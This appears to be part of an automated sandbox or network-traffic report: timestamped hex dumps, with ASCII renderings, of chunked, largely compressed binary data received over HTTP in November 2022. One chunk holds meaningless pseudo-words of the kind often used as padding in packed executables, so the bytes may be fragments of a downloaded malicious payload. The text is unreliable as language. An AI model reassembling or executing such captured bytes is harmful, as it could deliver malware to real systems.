                                                        2022-11-20 22:29:22 UTC224INData Raw: 32 30 30 30 0d 0a 78 9c 04 e0 4b 2a 24 bf ff 41 33 b1 be 27 47 01 92 b0 17 f3 df c6 0f e0 8f a3 fc db 80 c6 94 03 34 01 d7 cd 9b d0 c1 39 da 1e 07 3a eb 41 31 d1 ad e2 e2 74 58 3e b6 ec d5 df 9e 16 88 b1 67 06 f7 f3 3e 10 0f f1 9a 2d fd 19 4f 5e 7e 28 c3 66 26 29 eb d6 ca 34 09 28 10 af 19 11 46 c2 53 6d 34 2b 6a 1a d8 87 26 b6 e1 45 09 67 cb 26 9b cc 5d 4e ba 97 34 35 b0 f6 96 f2 5c 1f 99 c5 4a 71 51 af b9 ff 27 69 d5 ac 14 a9 da 98 3e 39 93 f7 28 b4 b9 d4 33 4c ba 39 d4 ae 00 fa cd 77 f8 ea e0 07 d5 c8 5a 61 13 71 0d 4a ff ae 24 20 78 db 62 5f d1 0c 26 01 4a d9 cd 1a f1 6f b9 1b 2d 40 78 6b ac c7 cb b1 dd 89 6c c2 b9 aa d0 25 08 74 27 a6 06 82 46 c0 f7 41 b6 f9 a5 83 8c 56 2a 67 26 2c 7e 4e 4a 3f 4a 34 ad 76 66 97 f1 0f d4 00 66 2f 37 48 77 81 5d 9b 69
                                                        Data Ascii: 2000xK*$A3'G49:A1tX>g>-O^~(f&)4(FSm4+j&Eg&]N45\JqQ'i>9(3L9wZaqJ$ xb_&Jo-@xkl%t'FAV*g&,~NJ?J4vff/7Hw]i
                                                        2022-11-20 22:29:22 UTC232INData Raw: 17 6a da 76 dd 9a
                                                        Data Ascii: jv
                                                        2022-11-20 22:29:22 UTC232INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC232INData Raw: 32 30 30 30 0d 0a e6 16 89 f2 09 28 93 35 24 72 98 d8 48 e9 1b 3b 13 4b e3 01 f4 46 0e fb 59 d9 cb c0 be fc 4d 34 43 65 44 ec 3f 5e 48 20 f4 4f cf f0 81 8d 5c 4a 84 e0 5f 0b a8 0d b8 9f 82 f8 07 99 73 9c 3f 18 26 48 c1 26 5e e8 db 71 6d f6 97 2a 8d 5d a3 7b 68 65 64 1e 6e fe de 02 63 dc 44 8b cd 2f 1a 0c 29 67 19 ff 73 30 2e da 1d 05 d4 18 ff 01 26 93 33 72 b0 f7 c0 1c 1a 15 07 5c 20 1d 39 cf 43 25 1f 43 5a 46 9b e8 3b 9c b1 49 12 8d 66 1f 85 a0 06 9b 2f 76 94 55 ff fe af 65 08 28 50 99 ab 03 ef 0c 05 14 87 53 1f 15 bd 2e 5b 79 a1 96 75 28 cb b2 13 47 de f8 ff f6 70 d8 58 26 28 26 56 ac cc 09 31 50 14 f7 fd fa 05 bb 67 b6 d6 52 30 8e 9d 98 38 bf 02 ae 49 1d a5 80 3c 92 8e e5 f0 40 30 67 03 27 2a b2 07 be e7 78 de a3 ea 49 92 98 33 01 76 f6 6b f5 4d 53 9e
                                                        Data Ascii: 2000(5$rH;KFYM4CeD?^H O\J_s?&H&^qm*]{hedncD/)gs0.&3r\ 9C%CZF;If/vUe(PS.[yu(GpX&(&V1PgR08I<@0g'*xI3vkMS
                                                        2022-11-20 22:29:22 UTC240INData Raw: 2e c1 56 6c 93 55
                                                        Data Ascii: .VlU
                                                        2022-11-20 22:29:22 UTC240INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC240INData Raw: 32 30 30 30 0d 0a b5 28 4f 1c 22 78 f2 3b 58 56 93 1c 1b 22 9c 3f b0 b0 7c d0 cd ce cf 91 13 37 9c 14 40 b1 8e 24 02 9c b1 7d 39 3f bb 29 b6 de f5 19 06 0b b9 c9 b0 a1 bc 90 ac 29 2b 48 e0 b8 24 b5 4f 01 28 99 48 89 68 8c bf e5 f1 70 ad fc 87 5c fe 83 cf a5 aa 3b 92 79 c7 29 03 3b 4c 7f f7 c9 97 f6 5b 2e 8b 5b 5e 3f 3a 31 9c 0e d6 0a bf a5 56 96 4d 4b 70 12 27 88 b3 e8 8a c5 bb 2f 9d 92 9b 3c 58 f4 53 92 03 b6 d6 f1 0f 94 26 5c 60 83 2b 43 32 80 eb f6 2c 02 f9 44 97 e4 aa 02 d0 d2 cc 78 ae b9 7e 5f c2 8b fd 6b 15 b9 07 88 60 3c 58 3b e6 66 a7 f3 0c f6 5b b1 f5 ef 32 37 c6 d9 af f0 02 5c eb 65 49 a6 81 26 b6 d6 0f 32 59 1a b0 5e 8f 9f 46 86 dc 71 27 bc c8 45 30 0c 24 2f 10 65 13 fd cb c8 f1 61 75 75 fd 42 f9 d1 2a fc 4a 1c bf 00 41 ca 4e f0 ca 27 61 93 93
                                                        Data Ascii: 2000(O"x;XV"?|7@$}9?))+H$O(Hhp\;y);L[.[^?:1VMKp'/<XS&\`+C2,Dx~_k`<X;f[27\eI&2Y^Fq'E0$/eauuB*JAN'a
                                                        2022-11-20 22:29:22 UTC248INData Raw: 44 80 72 84 f5 e9
                                                        Data Ascii: Dr
                                                        2022-11-20 22:29:22 UTC248INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC248INData Raw: 31 66 66 38 0d 0a 86 a9 9b 12 5b 88 f6 93 ee ba b1 6c 39 bb e6 d3 e0 40 2f 6d 5e 58 d1 4a 7d 9a ea 49 58 7b 0f 1c 86 f7 71 1e 2e ca d4 b2 70 5e ba 50 7d b0 61 21 65 cb be a3 74 66 8c eb 0d df f2 fa bf 94 dd 72 07 15 34 2f 65 94 20 d4 86 15 4c 36 23 89 e9 93 14 4f d9 31 13 4c 5d 5f 64 75 ea 66 21 f9 7e 7d ee 2a a8 c2 82 80 d8 45 02 5b 60 80 2c b3 c9 99 1c 25 91 ac bd 04 66 b3 b0 ed 5d a7 25 44 ae 2a c0 ab f9 c4 1f e7 3c 90 0e 13 9a ce 2f ba 9d 8e d3 1c f1 a0 a1 81 a3 b1 c9 6b 6e a6 be b5 7f fd 72 70 63 10 db 08 30 0a 88 71 46 b1 3e af b5 00 77 56 91 2f de 19 a0 a0 06 ee 74 17 08 d1 f8 2e 02 0f b7 d8 5f b2 bb cd 75 eb 18 5f 35 1d d6 75 95 bd 25 5d 35 35 03 6e 50 cd fb 3c 64 85 c1 1f 2c 37 98 f0 51 f7 c6 14 cd 96 e0 e9 df 5a 64 7b 0b 6e da a9 0b 03 1f df 11
                                                        Data Ascii: 1ff8[l9@/m^XJ}IX{q.p^P}a!etfr4/e L6#O1L]_duf!~}*E[`,%f]%D*</knrpc0qF>wV/t._u_5u%]55nP<d,7QZd{n
                                                        2022-11-20 22:29:22 UTC256INData Raw: 32 30 30 30 0d 0a
                                                        Data Ascii: 2000
                                                        2022-11-20 22:29:22 UTC256INData Raw: bd ee 86 08 c6 55 4b 63 e9 e9 b1 08 80 22 b3 c7 ad 4b 1a 0f f8 65 de 22 3c 72 fb e0 a4 e3 41 aa da 96 59 9d e9 e6 a3 07 31 5e 8e e1 d7 19 24 29 7f 79 54 c1 09 6f 7a 29 11 d6 e4 f4 6a fd 66 c0 26 78 4f bb 23 6c 99 aa e4 24 e7 00 c0 86 5a 2f 46 20 cc 74 27 9c e5 36 5e a0 f8 12 63 a8 1a e4 20 f9 c1 15 88 a3 9e c0 99 a5 24 a0 e3 e8 30 d0 bc 32 28 3f 70 c0 26 79 a4 d2 22 63 f2 a5 1f 0f d5 5b dc 72 7e c9 01 64 23 c3 ef 53 b7 89 e7 87 8c 3e c2 d7 40 26 ff 05 54 73 8c d0 2f 56 61 5f 69 de 48 28 ea c7 e5 23 fa 55 aa 47 81 8b 7f 93 2a cf c8 68 44 50 23 2d 6f 7a 57 fb a9 2f 52 57 d1 9d 72 50 7a 6c c4 82 e6 23 52 c3 11 8a 6a dc 04 27 29 6e b9 b8 38 d7 4d 56 f4 5e 2f b3 6a ea 0b 1a eb c8 6d d2 6e 48 b6 84 da dd b5 52 d9 05 b6 a4 2f e5 9c b3 90 f0 84 09 41 0d 59 04 8b
                                                        Data Ascii: UKc"Ke"<rAY1^$)yToz)jf&xO#l$Z/F t'6^c $02(?p&y"c[r~d#S>@&Ts/Va_iH(#UG*hDP#-ozW/RWrPzl#Rj')n8MV^/jmnHR/AY
                                                        2022-11-20 22:29:22 UTC264INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC264INData Raw: 32 30 30 30 0d 0a 13 54 c5 d4 f5 da 83 5b 85 30 a6 c9 b6 f8 77 5b 55 e6 1c b1 4a 35 c4 78 bb 83 76 13 91 df d3 1b 52 00 cf ac b8 6a f3 f2 a7 ca 6a ec ca f1 e2 8e 37 23 e7 b9 6d 2d 58 ea 9c 4b b8 b9 8f e9 8b d2 23 7c bc 86 7e 93 87 34 1e 54 23 5f 92 27 04 d3 02 0d f0 46 5d 9e 88 5c 65 9e 45 f3 9b 01 b3 02 22 c3 f9 a5 f1 80 fe 95 0e 47 45 41 f2 ae 33 e6 af e7 97 81 4c e3 36 26 ed 82 3e e4 d3 20 a5 a1 d1 8a dd d6 20 a4 ca 10 8e 7c ff 29 d0 4a a3 b5 a7 3d 79 2d b1 b8 63 2f 5f eb 5d c6 8b bc 35 90 97 1f 17 bd f5 2f 6a 21 7d e4 3b 31 32 8e cc a2 81 20 22 11 5c 28 8f a4 c3 44 df 64 82 82 39 76 d5 a0 0d d1 f9 24 4d 05 94 41 e1 54 52 f2 51 ef 36 e2 7d 13 cc d0 77 66 fe b9 c7 d0 4e 4f f9 85 a8 43 08 28 db 09 36 4d b2 41 b3 f5 46 0d cc 91 bc 4e 23 62 18 84 81 e9 bc
                                                        Data Ascii: 2000T[0w[UJ5xvRjj7#m-XK#|~4T#_'F]\eE"GEA3L6&> |)J=y-c/_]5/j!};12 "\(Dd9v$MATRQ6}wfNOC(6MAFN#b
                                                        2022-11-20 22:29:22 UTC272INData Raw: d9 73 4a 91 eb ec
                                                        Data Ascii: sJ
                                                        2022-11-20 22:29:22 UTC272INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC272INData Raw: 32 30 30 30 0d 0a 8e 6d ee 31 69 f7 0e 3b 90 5a 0c 9d 43 0a e7 7f ad 4b d4 32 df 16 56 ac 70 fa 4b bc 96 bf d3 15 2b ea a1 58 cd fe 36 7c 17 0f f8 79 30 f5 62 de 8b 52 ab 0f 20 89 de 91 13 c4 96 c2 c6 e1 41 75 fc f6 49 91 40 4b b4 d4 d3 74 f1 fd e8 83 33 fc f8 4d dc a7 a9 8f 2f e6 03 e5 69 a9 f6 f5 f6 77 69 d3 53 dd 61 10 3d 55 12 69 c2 d4 c0 15 2a 8c 15 0c 53 bb 7f 45 c4 15 fa ea fb 52 bf bf 34 ca ba 61 40 76 b2 da ba 68 d8 c1 72 dd 84 06 c2 66 50 ab 2f d1 ab e6 c8 35 1c f8 00 56 87 4f 9b 3e 8e 07 12 37 f6 1b c8 da c4 64 5f d0 25 ec 7c f6 89 2e 18 d3 f4 c5 a6 0f 2f 90 2d 62 35 c2 ca 02 1f fe 9d 24 7e a9 57 9c b7 b0 69 7a e2 9b f6 fa bb 65 89 70 5e f8 39 fa 2b 42 fc 31 5c 56 61 bd f0 bf 4e 93 cd 4e 90 1b f6 da 0c 80 b6 3f dc 25 e6 1c e7 ba f5 37 2e e8 ce
                                                        Data Ascii: 2000m1i;ZCK2VpK+X6|y0bR AuI@Kt3M/iwiSa=Ui*SER4a@vhrfP/5VO>7d_%|./-b5$~Wizep^9+B1\VaNN?%7.
                                                        2022-11-20 22:29:22 UTC280INData Raw: 6a c6 60 58 86 8b
                                                        Data Ascii: j`X
                                                        2022-11-20 22:29:22 UTC280INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC280INData Raw: 32 30 30 30 0d 0a 5c 26 07 9f f5 7e 0e 35 7b a2 12 9d 6c e4 07 61 0d 7b 9d cd b0 b4 08 34 ae 72 d8 77 a4 3e b4 a3 ec 33 3f 0e e4 5a d4 6b be cb 30 89 bb 04 17 cd da 8e ae d1 a0 a3 16 08 0b 41 54 44 22 ab c7 16 d1 67 78 38 b0 87 c9 09 4b aa c6 77 8c 85 61 34 b4 a0 54 c1 6b 4b af f5 6b 63 2d b9 60 5a 3e 48 ea 0f 19 d8 1c a7 e3 4c 84 97 a6 4b 2a 7d 70 d6 82 3a 2a 49 46 98 51 c8 35 9a 15 7e 14 c4 ee 06 e6 79 ae eb b1 bd 9b 73 2f 06 8f 7a 0d 71 75 65 88 e2 d2 2d b1 c2 f5 de 39 37 ab 95 8d d6 1b fa 87 2d 1f 7c 6f 33 c9 8a 1a 9d 44 12 1c 11 21 f0 3a 30 43 da 77 17 64 36 79 44 54 d2 3b 92 d3 74 3d ed 8e af 7e c7 1a 77 0f 50 13 7b 23 3f 38 26 08 f0 15 be af 68 cd 15 23 ee 99 0a 70 5d d1 a2 f0 2e e9 27 87 17 b4 94 8d 0c 63 99 e9 a3 09 85 28 b7 ca e5 86 c0 b6 fc 27
                                                        Data Ascii: 2000\&~5{la{4rw>3?Zk0ATD"gx8Kwa4TkKkc-`Z>HLK*}p:*IFQ5~ys/zque-97-|o3D!:0Cwd6yDT;t=~wP{#?8&h#p].'c('
                                                        2022-11-20 22:29:22 UTC288INData Raw: 33 0b e3 15 26 51
                                                        Data Ascii: 3&Q
                                                        2022-11-20 22:29:22 UTC288INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC288INData Raw: 32 30 30 30 0d 0a 37 da d7 6b c6 19 21 a9 d3 41 a3 d9 39 ef 9f eb ff 9d e9 1f ce 6d 94 53 0b 7c 50 41 dd cf 15 11 f7 79 e8 b3 86 a1 51 8e 11 12 d7 a6 78 bf 24 94 1e b9 73 c7 d3 76 c6 3c 1c c1 81 e6 a8 d7 30 01 69 55 ae 2f 3d 23 ac c8 93 e4 b3 73 17 73 f5 4f bc 36 b9 c8 14 e7 28 a3 e4 e4 48 16 ab e9 bd 6c 9c 65 ee 01 f2 c6 96 0f 98 79 a0 b3 ed 3c ab 28 40 d5 0b 99 40 bd 55 8a 2c b3 94 93 1e 35 0f ce c7 9c f3 74 78 be 9d 9d c9 28 e8 24 ec 1f f1 89 db 2e a7 7e 15 4b 7a 40 4f 99 70 2e 2e 2c 0d fe 89 a9 5d 96 13 41 37 70 36 35 ca 6e a7 bb ac cc c0 8a c0 2c 91 61 4d 5c bd 59 01 79 46 90 af 70 27 88 2a 0d a1 f5 24 5d 5a 66 98 4d 67 f2 b3 42 f5 16 73 ae 55 10 17 dc 29 aa 2d 71 e9 0d 31 14 ad 18 1e db 5b 3f 50 6d c5 26 ba c9 8f b7 9a 32 ed d0 7b 28 e1 e5 01 ba b4
                                                        Data Ascii: 20007k!A9mS|PAyQx$sv<0iU/=#ssO6(Hley<(@@U,5tx($.~Kz@Op..,]A7p65n,aM\YyFp'*$]ZfMgBsU)-q1[?Pm&2{(
                                                        2022-11-20 22:29:22 UTC296INData Raw: 0c 89 ad 47 bc 3a
                                                        Data Ascii: G:
                                                        2022-11-20 22:29:22 UTC296INData Raw: 0d 0a
                                                        Data Ascii:
                                                        Data Ascii: ~w~vyv}~CQ63~0FUEj~URQP~~r~R~Yww}v~wm~fH?
                                                        2022-11-20 22:29:22 UTC520INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC520INData Raw: 32 30 30 30 0d 0a 80 ba c0 4a 5f 7f 80 7e 5c 81 8f ca 7f 8d b3 c4 7f 8e be b3 7d 89 bf bf 7b 81 c5 bc 7e 7f c1 c6 80 87 b5 ba 7f 88 c0 ba 80 8b c6 c7 7f 97 c0 c1 7f 9f b6 c1 7e 94 c8 c6 7e 9f be bc 80 9d c6 b6 81 a8 ba b2 81 ab bb c4 7f 80 c1 bf 5d 7f 86 9f 80 a5 a4 5a 7f 9e a8 50 92 7f 82 44 7e a0 a0 2e 80 cd d9 34 7f ca c2 38 80 cc c6 42 80 8e bc 49 3b 4c 80 39 00 00 00 00 5f 80 6f 31 81 c3 b0 3e 7f 81 81 40 76 7f 7f 6a 68 7e 9b b5 81 96 b4 bf 81 95 c3 c1 7f 81 c1 c0 80 7f c0 bf 78 80 bb c4 80 86 b8 b2 7f 7f bd b4 80 97 c4 c7 80 92 bb b4 81 9a be c9 7e 99 c0 bf 80 98 ba c6 80 a3 bb bd 7f a9 c6 c4 7f 9f b0 b6 7e 7e aa b3 53 7e 87 80 81 b8 af 55 81 c5 b7 52 7f ad ae 58 88 ac b2 58 80 bc c2 44 80 cd c7 3b 7e c8 b9 3b 80 80 bc 37 00 00 00 00 00 00 00 00 4d
                                                        Data Ascii: 2000J_~\}{~~~]ZPD~.48BI;L9_o1>@vjh~x~~~S~URXXD;~;7M
                                                        2022-11-20 22:29:22 UTC528INData Raw: ff ff ff ff 00 00
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC528INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC528INData Raw: 32 30 30 30 0d 0a ff ff ff ff ff ff 00 00 80 00 00 00 ff ff 00 00 80 00 00 00 ff ff 00 00 00 00 00 00 7f ff 00 00 00 00 00 00 7f ff 00 00 00 00 00 00 7f ff 00 00 00 00 00 00 7f ff 00 00 00 00 00 00 7f ff 00 00 00 00 00 00 7f ff 00 00 00 00 00 00 7f ff 00 00 00 00 00 00 7f ff 00 00 00 00 00 00 7f ff 00 00 00 00 00 00 7f ff 00 00 00 00 00 00 7f ff 00 00 00 00 00 00 7f ff 00 00 00 00 00 00 7f ff 00 00 00 00 00 00 7f ff 00 00 00 00 00 00 7f ff 00 00 00 00 00 00 ff ff 00 00 00 00 00 00 ff ff 00 00 00 00 00 00 ff ff 00 00 00 00 00 00 ff ff 00 00 00 00 00 00 ff ff 00 00 00 00 00 00 ff ff 00 00 00 00 00 00 ff ff 00 00 00 00 00 00 ff ff 00 00 00 00 00 00 ff ff 00 00 00 00 00 00 ff ff 00 00 00 00 00 00 ff ff 00 00 00 00 00 00 ff ff 00 00 00 00 00 00 ff ff 00 00 00
                                                        Data Ascii: 2000
                                                        2022-11-20 22:29:22 UTC536INData Raw: c1 c4 7e 7e 7f c7
                                                        Data Ascii: ~~
                                                        2022-11-20 22:29:22 UTC536INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC536INData Raw: 32 30 30 30 0d 0a 7f 7e 7f c7 9c c6 8b 44 8c ca 82 37 9d bc 95 3f 9e b2 96 44 a2 c7 9a 45 b1 ac ac 3a bf 92 d2 3b b8 85 c9 37 b6 be ac 2c af be b2 23 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7e 7e 81 c8 80 7e 7f bb bb bb c4 b4 a4 a7 aa bf 92 90 94 bb 80 81 80 c0 c8 bb bd bd bf c3 c0 c2 c2 b9 c7 c3 c2 ce cf be b9 ca c7 c3 81 7f 7f c7 98 9e 99 b3 bb bd b3 c3 c5 c0 bc c9 c0 c2 c3 be a1 b5 b2 c9 af bb a9 cb 7e 7f 82 c7 81 7f 7f ba a5 a5 b7 be ba b1 b7 bc b2 b6 ae bf a5 b9 b1 bf a9 b4 b3 bf 7e 80 81 c1 80 80 84 c1 96 a6 a0 c1 c2 ba b9 bf 81 81 7f bf 81 81 80 d1 7f ca 88 36 7f c5 86 40 80 d5 7e 3a 94 ae a1 3f 96 b3 9e 3b bb 90 c3 42 b3 86 cb 34 bc 8e d2 3e b1 c0 b3 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii: 2000~D7?DE:;7,#~~~~~6@~:?;B4>'
                                                        2022-11-20 22:29:22 UTC544INData Raw: 80 25 63 80 80 29
                                                        Data Ascii: %c)
                                                        2022-11-20 22:29:22 UTC544INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC544INData Raw: 32 30 30 30 0d 0a 4e 7e 80 38 47 7d 80 2d 4f 80 7f 1f 7f 56 80 26 85 57 80 28 00 00 00 00 00 00 00 00 00 00 00 00 80 7f 7e cc c3 c5 c4 c1 9f 9b ad c9 7f 7e 7e be bc bc bc ba c5 bc be c7 c0 bd ab c8 bf c4 be bc 7f 80 7f bd c4 b8 c9 b4 bb bf bb c0 ba b6 ba c9 b2 c2 c5 c6 80 80 81 b8 cf c8 c0 c5 c6 c3 bc cb cf c4 c9 cb a6 9f a3 b8 7f 7e 7e c3 a1 aa a2 b7 be b0 ba ca 80 7e 80 bb 7e 7e a9 43 40 7b 81 27 54 66 81 20 5c 5a 7f 32 5d 5d 80 20 00 00 00 00 7e 53 7f 20 80 57 7f 2d 00 00 00 00 00 00 00 00 7f 7f 81 be bc c0 bc b5 a7 a9 a2 cb 7f 7f 81 c4 c2 cc b8 c5 be c7 bb ca b9 c8 b2 c4 c2 bc be bf 7f 7f 7f c0 ba b7 bb be c5 c2 ba c3 be c3 be be bd b5 bd bf 80 81 7f b8 bf b3 c7 bc be c7 b2 c9 c1 b1 cb c0 ad af b8 bd 7e 81 80 c2 a3 a3 9b c0 b3 ba bb b8 7f 80 7e c1 b9
                                                        Data Ascii: 2000N~8G}-OV&W(~~~~~~~~C@{'Tf \Z2]] ~S W-~~
                                                        2022-11-20 22:29:22 UTC552INData Raw: f9 f9 f9 f9 f9 f9
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC552INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC553INData Raw: 32 30 30 30 0d 0a f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 87 a2 e8 e8 e8 e8 e8 e8 a2 87 f9 f9 f9 f9 f9 05 f9 05 f9 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 f9 87 a2 e8 e8 e8 e8 e8 e8 a2 87 f9 05 2c 05 2c 05 2c 2c 2c 05 2c 2c 2c 2c 2c 2c 2c 2c 4d 2c 4d 4d 4d 4d 4d 4d 9d 4d 9d 4d 9d 4d 9d 4d 9d 4d 9d 28 87 a2 e8 e8 e8 e8 e8 e8 a2 87 05 05 2c 05 2c 05 2c 05 2c 2c 2c 2c 05 2c 2c 2c 2c 2c 2c 4d 2c 2c 2c 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 4d 28 87 a2 e8 e8 e8 e8 e8 e8 a2 87 05 05 2c 05 2c 05 2c 05 2c 05 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 4d 2c 2c 4d 3e 3e 3e 4d 4d 4d 4d 4d 4d 4d 4d 4d 28 87 a2 e8 e8 e8 e8 e8 e8 a2 87 f9 05 2c 05 2c 05 2c 05 2c 2c 05 2c 05 2c 2c 05 2c 2c 2c
                                                        Data Ascii: 2000,,,,,,,,,,,,,M,MMMMMMMMMMM(,,,,,,,,,,,,,M,,,MMMMMMMMMMMMMM(,,,,,,,,,,,,,,,M,,M>>>MMMMMMMMM(,,,,,,,,,,,
                                                        2022-11-20 22:29:22 UTC561INData Raw: c9 30 00 00 00 00
                                                        Data Ascii: 0
                                                        2022-11-20 22:29:22 UTC561INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC561INData Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 81 7f ba 80 7f 7f c1 80 7e 81 c2 7f 81 80 c3 7f 80 7f d2 80 80 7f b6 80 80 7f c6 7e 7f 80 cd 7e 7e 7e be 80 81 7e ca 7f 80 7f ce 7f 80 80 c8 7e 81 7f c1 7e 7f 7f c9 7f 7f 7e c3 80 7e 7f cd 7f 7e 7e c6 80 80 81 c3 7e 80 80 cb 7f 7e 81 d1 7f 7f 81 bd 7f 80 7f ca 7f 80 7f c4 80 80 7e c5 7e 7f 80 c8 7f 80 7f c8 80 7f 81 cb 80 7e 80 cf 81 80 7e c4 7e 7f 81 c4 81 7f 7f bf 80 80 7f cb 80 7f 7e c6 80 81 7f c6 81 81 80 bf 81 7f 7e cf 81 80 7e cd 80 80 7e c4 7f 80 81 cb 81 80 81 c0 80 80 80 c0 81 7e 80 ba 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii: 2000~~~~~~~~~~~~~~~~~~~~~~~~
                                                        2022-11-20 22:29:22 UTC569INData Raw: 86 3f 98 c8 85 37
                                                        Data Ascii: ?7
                                                        2022-11-20 22:29:22 UTC569INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC569INData Raw: 31 66 66 38 0d 0a 96 d8 86 38 9d cd 8c 40 92 cd 8c 36 91 cb 81 37 9c c8 88 42 95 c5 88 40 95 cd 84 34 8a cb 8c 40 94 cd 8f 3c 95 ce 80 41 93 d3 84 40 99 c1 7e 34 93 d2 8a 41 a0 d0 7e 3a a0 d4 85 48 b9 c4 a0 3d ca cd 99 3e d2 c7 97 2e ba ce 9f 41 d8 a6 80 34 c5 a9 81 31 be a5 7e 40 d4 9c 7e 3a c9 a8 7f 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cc ab 80 30 ce a5 7e 3c c6 9f 80 38 c6 a0 7f 3c c0 a3 81 34 c2 a5 7e 34 ca 98 80 3d c5 9e 81 37 cf a1 80 36 d2 ab 7f 2f ce a0 7f 3a d1 a3 7f 3e cc a1 81 41 c2 9d 7e 3c d7 a7 80 3c c8 a9 81 3c ca 9b 80 36 d9 a9 7f 3a ca ab 80 33 cc a9 80 32 cd 96 81 3c c5 a1 7e 3c c8 ac 81 3f cc
                                                        Data Ascii: 1ff88@67B@4@<A@~4A~:H=>.A41~@~:30~<8<4~4=76/:>A~<<<6:32<~<?
                                                        2022-11-20 22:29:22 UTC577INData Raw: 32 30 30 30 0d 0a
                                                        Data Ascii: 2000
                                                        2022-11-20 22:29:22 UTC577INData Raw: b3 b5 ab ce af b5 a9 ca 7e 80 7f c8 bd c7 a0 39 00 00 00 00 81 7f 7f c1 b9 c1 bc c5 c0 ca c2 c9 bb c2 b4 c3 bd ba c4 c9 c0 bb b0 c8 67 7f 7f c3 91 bb c2 c7 75 83 bf d4 63 7f 80 cd b7 b9 b0 c3 bd c2 ad bb b3 ba ae c6 7f 80 7f c9 cb 86 80 3b 00 00 00 00 7e 7e 7e c7 bc c0 b5 ce bd c1 cb cc c2 c6 b4 d0 c4 bb c0 bf be b9 c2 c4 77 7f 84 bf 82 bd cb cc 7f 9f be c0 80 8a d1 c9 6a 81 7e d0 ad b1 b2 ce ab bd b8 c1 7e 80 7f c8 c9 88 8b 3e 00 00 00 00 80 7f 7e cb c3 cd ce c5 c1 bf c0 c0 c1 c3 c2 c0 b8 c1 bb c3 c1 b8 b9 ca b7 b5 b5 cd 71 7f 80 c7 7f be c5 c5 80 a0 be c1 7f 8a b9 d0 66 81 80 ca b6 ba ae cc 80 81 80 c9 b9 c7 9d 39 00 00 00 00 7e 80 80 c4 ba ca c8 c7 cb c5 c8 c5 c0 c7 c3 cd c2 b7 bc ce bb c1 bf cd be ba b9 c9 c5 c0 ac c0 76 81 80 d0 94 b7 b3 d1 7f a4 c5
                                                        Data Ascii: ~9guc;~~~wj~~>~qf9~v
                                                        2022-11-20 22:29:22 UTC585INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC585INData Raw: 32 30 30 30 0d 0a 6c 61 2e 20 4c 6f 6b 6f 79 6f 73 75 6d 75 6d 6f 20 68 61 6a 61 63 69 6d 61 72 61 67 2e 20 42 65 76 75 68 61 20 78 6f 63 65 67 2e 20 47 65 63 69 76 20 74 65 64 75 64 61 79 20 76 65 76 20 70 65 76 69 72 65 73 20 6d 65 7a 69 68 69 62 6f 2e 20 53 75 70 75 67 75 6c 2e 20 4d 61 77 65 63 20 6a 75 72 61 6b 69 6e 69 66 20 67 61 73 6f 74 61 6a 69 20 6b 65 79 75 66 65 67 2e 20 5a 75 62 6f 20 6a 65 6b 75 6b 61 6d 65 6d 6f 78 75 6c 65 2e 20 48 61 76 75 6e 69 6d 75 64 61 20 70 75 62 65 72 65 6d 6f 72 20 67 65 63 69 74 69 63 65 73 65 79 20 68 75 6e 65 67 69 79 20 74 75 63 61 62 61 6c 69 6e 61 76 69 79 65 6b 2e 20 46 6f 68 61 67 75 62 75 6d 69 63 69 77 61 2e 20 4b 6f 62 6f 6a 65 64 20 7a 65 6c 75 70 61 77 65 64 65 79 20 79 65 66 69 6a 75 6a 61 7a 69 72
                                                        Data Ascii: 2000la. Lokoyosumumo hajacimarag. Bevuha xoceg. Geciv teduday vev pevires mezihibo. Supugul. Mawec jurakinif gasotaji keyufeg. Zubo jekukamemoxule. Havunimuda puberemor geciticesey hunegiy tucabalinaviyek. Fohagubumiciwa. Kobojed zelupawedey yefijujazir
                                                        2022-11-20 22:29:22 UTC593INData Raw: ff ff ff ff 00 00
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC593INData Raw: 0d 0a
                                                        Data Ascii:
